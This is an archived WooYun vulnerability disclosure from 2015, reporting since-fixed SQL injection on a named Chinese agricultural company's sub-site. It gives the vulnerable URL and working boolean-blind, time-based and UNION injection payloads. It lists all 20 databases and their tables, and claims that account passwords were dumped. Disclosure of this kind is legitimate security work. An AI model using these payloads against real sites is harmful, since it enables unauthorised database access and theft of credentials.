Vulnerability summary

Defect ID: wooyun-2015-0153272

Title: SQL injection in an 阿哥汇 sub-site (exposes 20 databases / 599 tables / every account password)

Vendor: 北京士惠农业发展有限公司 (Beijing Shihui Agricultural Development Co., Ltd.)

Author: 路人甲

Submitted: 2015-11-10 13:54

Fixed: 2015-11-20 19:03

Published: 2015-11-20 19:03

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-11-10: details sent to the vendor, awaiting vendor action
2015-11-11: vendor confirmed; details visible to the vendor only
2015-11-20: vendor fixed the issue and chose to publish; details now public

Brief description:

Exposes every account name and password; can be used for further exploitation.

Details:

Main site:

http://www.agrite.com.cn


The sub-site is injectable through the id parameter:

http://www.originseed.com.cn/news/view.php?id=894


A single quote produces a database error:

(screenshot: 1.jpg)


Appending 'and '1'='1 returns the page normally (the quote terminated a string literal and the rest of the input was parsed as SQL):

(screenshot: 2.jpg)


---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.originseed.com.cn:80/news/view.php?id=894' AND 7495=7495 AND 'rYBa'='rYBa

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.originseed.com.cn:80/news/view.php?id=894' AND (SELECT * FROM (SELECT(SLEEP(5)))aTkT) AND 'rXKJ'='rXKJ

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://www.originseed.com.cn:80/news/view.php?id=-1455' UNION ALL SELECT NULL,CONCAT(0x716a7a7a71,0x69494253477a78424256,0x716a6a6271),NULL,NULL--
---

Proof of vulnerability:

available databases [20]:
[*] cdcol
[*] daizhuang
[*] dict
[*] discuz
[*] information_schema
[*] mambo
[*] mysql
[*] OriginChangchun
[*] OriginHr
[*] OriginPro
[*] originseed
[*] OriginWeb
[*] performance_schema
[*] phpmyadmin
[*] rbac
[*] seed
[*] sino
[*] test
[*] ttq
[*] ucenter


Database: cdcol
[1 table]
+----------------------------------------------+
| cds |
+----------------------------------------------+
Database: phpmyadmin
[10 tables]
+----------------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_designer_coords |
| pma_history |
| pma_pdf_pages |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pma_tracking |
| pma_userconfig |
+----------------------------------------------+
Database: ttq
[108 tables]
+----------------------------------------------+
| sdb_admin_roles |
| sdb_advance_logs |
| sdb_articles |
| sdb_autosync_rule |
| sdb_autosync_rule_relation |
| sdb_autosync_task |
| sdb_brand |
| sdb_cachemgr |
| sdb_comments |
| sdb_cost_sync |
| sdb_coupons |
| sdb_coupons_p_items |
| sdb_coupons_u_items |
| sdb_ctlmap |
| sdb_currency |
| sdb_dapi |
| sdb_dbver |
| sdb_delivery |
| sdb_delivery_item |
| sdb_dly_area |
| sdb_dly_center |
| sdb_dly_corp |
| sdb_dly_h_area |
| sdb_dly_type |
| sdb_gift |
| sdb_gift_cat |
| sdb_gift_items |
| sdb_gimages |
| sdb_gnotify |
| sdb_goods |
| sdb_goods_cat |
| sdb_goods_keywords |
| sdb_goods_lv_price |
| sdb_goods_memo |
| sdb_goods_rate |
| sdb_goods_spec_index |
| sdb_goods_type |
| sdb_goods_type_spec |
| sdb_goods_virtual_cat |
| sdb_gtask |
| sdb_image_sync |
| sdb_job_apilist |
| sdb_job_data_sync |
| sdb_job_goods_download |
| sdb_link |
| sdb_lnk_acts |
| sdb_lnk_roles |
| sdb_magicvars |
| sdb_member_addrs |
| sdb_member_attr |
| sdb_member_coupon |
| sdb_member_lv |
| sdb_member_mattrvalue |
| sdb_members |
| sdb_message |
| sdb_msgqueue |
| sdb_op_sessions |
| sdb_operators |
| sdb_order_items |
| sdb_order_log |
| sdb_order_pmt |
| sdb_orders |
| sdb_package_product |
| sdb_pages |
| sdb_payment_cfg |
| sdb_payments |
| sdb_plugins |
| sdb_pmt_gen_coupon |
| sdb_pmt_goods |
| sdb_pmt_goods_cat |
| sdb_pmt_member_lv |
| sdb_point_history |
| sdb_print_tmpl |
| sdb_product_memo |
| sdb_products |
| sdb_promotion |
| sdb_promotion_activity |
| sdb_promotion_scheme |
| sdb_pub_files |
| sdb_refunds |
| sdb_regions |
| sdb_return_product |
| sdb_sell_logs |
| sdb_sendbox |
| sdb_seo |
| sdb_settings |
| sdb_sfiles |
| sdb_sitemaps |
| sdb_spec_values |
| sdb_specification |
| sdb_status |
| sdb_supplier |
| sdb_supplier_pdtbn |
| sdb_sync_tmp |
| sdb_systmpl |
| sdb_tag_rel |
| sdb_tags |
| sdb_taobao_goods_goods |
| sdb_tb_order_ctl_order_items |
| sdb_tb_order_ctl_orders |
| sdb_tb_order_ctl_regions |
| sdb_tb_sales_download_sell_log |
| sdb_template_relation |
| sdb_themes |
| sdb_tpl_source |
| sdb_triggers |
| sdb_type_brand |
| sdb_widgets_set |
+----------------------------------------------+
Database: originseed
[12 tables]
+----------------------------------------------+
| OriginWeb_action |
| OriginWeb_annex |
| OriginWeb_class |
| OriginWeb_cn_class |
| OriginWeb_cn_feedback |
| OriginWeb_cn_menu |
| OriginWeb_manage_menu |
| OriginWeb_menu_type |
| OriginWeb_photo |
| OriginWeb_power |
| OriginWeb_user |
| OriginWeb_usergroup |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: ucenter
[19 tables]
+----------------------------------------------+
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+----------------------------------------------+
Database: daizhuang
[20 tables]
+----------------------------------------------+
| seed_action |
| seed_catalog |
| seed_center |
| seed_company |
| seed_contrast |
| seed_daizhuang_data |
| seed_exid |
| seed_farmer |
| seed_login |
| seed_menu |
| seed_power |
| seed_price |
| seed_product |
| seed_rice_contrast |
| seed_rice_daizhuang_data |
| seed_rice_exid |
| seed_rice_farmer |
| seed_user |
| seed_usergroup |
| seed_zoology |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: discuz
[103 tables]
+----------------------------------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_mytasks |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
+----------------------------------------------+
Database: rbac
[8 tables]
+----------------------------------------------+
| group |
| user |
| operation |
| rl_group_role |
| rl_role_operation |
| rl_user_group |
| rl_user_role |
| role |
+----------------------------------------------+
Database: sino
[11 tables]
+----------------------------------------------+
| sino_action |
| sino_area |
| sino_center |
| sino_hospital |
| sino_hospital_update |
| sino_login |
| sino_menu |
| sino_power |
| sino_powerprovince |
| sino_user |
| sino_usergroup |
+----------------------------------------------+
Database: seed
[12 tables]
+----------------------------------------------+
| menu |
| seed_center |
| seed_company |
| seed_contrast |
| seed_daizhuang_data |
| seed_exid |
| seed_farmer |
| seed_lan |
| seed_product |
| seed_product_ck |
| seed_user |
| seed_zoology |
+----------------------------------------------+
Database: OriginHr
[39 tables]
+----------------------------------------------+
| OriginHr_action |
| OriginHr_bxbiangeng |
| OriginHr_bxmonthdata |
| OriginHr_center |
| OriginHr_class |
| OriginHr_company |
| OriginHr_contract |
| OriginHr_depart |
| OriginHr_depart1 |
| OriginHr_domicile_class |
| OriginHr_dtemp |
| OriginHr_dtservice |
| OriginHr_emp |
| OriginHr_examination |
| OriginHr_fangtan |
| OriginHr_heding |
| OriginHr_hire_info |
| OriginHr_insurance |
| OriginHr_jiaban |
| OriginHr_jiangcheng |
| OriginHr_jianzhi |
| OriginHr_jitijiangcheng |
| OriginHr_kaoqin |
| OriginHr_menu |
| OriginHr_monthdata |
| OriginHr_nianjia |
| OriginHr_power |
| OriginHr_powercenter |
| OriginHr_powerdetail |
| OriginHr_property |
| OriginHr_qingjia |
| OriginHr_ruzhi |
| OriginHr_tiaoxiu |
| OriginHr_train |
| OriginHr_transfer |
| OriginHr_user |
| OriginHr_usergroup |
| OriginHr_work_class |
| OriginHr_zhuanzheng |
+----------------------------------------------+
Database: OriginWeb
[12 tables]
+----------------------------------------------+
| OriginWeb_class |
| OriginWeb_class_type |
| OriginWeb_cn_banner |
| OriginWeb_cn_class |
| OriginWeb_cn_feedback |
| OriginWeb_cn_menu |
| OriginWeb_group |
| OriginWeb_manage_menu |
| OriginWeb_menu |
| OriginWeb_three_menu |
| OriginWeb_twain_menu |
| OriginWeb_user |
+----------------------------------------------+
Database: mambo
[39 tables]
+----------------------------------------------+
| mos_banner |
| mos_bannerclient |
| mos_bannerfinish |
| mos_categories |
| mos_components |
| mos_contact_details |
| mos_content |
| mos_content_frontpage |
| mos_content_rating |
| mos_core_acl_aro |
| mos_core_acl_aro_groups |
| mos_core_acl_aro_sections |
| mos_core_acl_groups_aro_map |
| mos_core_log_items |
| mos_core_log_searches |
| mos_groups |
| mos_mambots |
| mos_mamhoo |
| mos_mamhoo_config |
| mos_mamhoo_salt |
| mos_mamhooks |
| mos_menu |
| mos_messages |
| mos_messages_cfg |
| mos_modules |
| mos_modules_menu |
| mos_newsfeeds |
| mos_poll_data |
| mos_poll_date |
| mos_poll_menu |
| mos_polls |
| mos_sections |
| mos_session |
| mos_stats_agents |
| mos_template_positions |
| mos_templates_menu |
| mos_users |
| mos_usertypes |
| mos_weblinks |
+----------------------------------------------+
Database: dict
[1 table]
+----------------------------------------------+
| sentence |
+----------------------------------------------+
Database: OriginChangchun
[100 tables]
+----------------------------------------------+
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_extend_setting |
| v9_favorite |
| v9_hits |
| v9_ipbanned |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_data |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201305 |
| v9_poster_201306 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_sms_report |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_tag |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_video_store |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
+----------------------------------------------+
Database: OriginPro
[26 tables]
+----------------------------------------------+
| OriginHr_action |
| OriginHr_center |
| OriginHr_class |
| OriginHr_company |
| OriginHr_contract |
| OriginHr_depart |
| OriginHr_domicile_class |
| OriginHr_menu |
| OriginHr_power |
| OriginHr_powercenter |
| OriginHr_powerdetail |
| OriginHr_property |
| OriginHr_ptcixiongsui |
| OriginHr_ptexptype |
| OriginHr_pthuaqi |
| OriginHr_ptitem |
| OriginHr_ptjichan |
| OriginHr_ptjidi |
| OriginHr_ptkaozhong |
| OriginHr_ptmiaoqi |
| OriginHr_ptqinbentype |
| OriginHr_ptshengyu |
| OriginHr_ptzhizhu |
| OriginHr_user |
| OriginHr_usergroup |
| OriginHr_work_class |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+


Account names and passwords:

(screenshot: 3.jpg)

Suggested fix:

Any gift?

Copyright notice: credit 路人甲@乌云 (WooYun) when republishing.


Vulnerability response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-11-11 09:52

Vendor reply:

Thanks to 路人甲 for the selfless contribution.

Latest status:

2015-11-20: fixed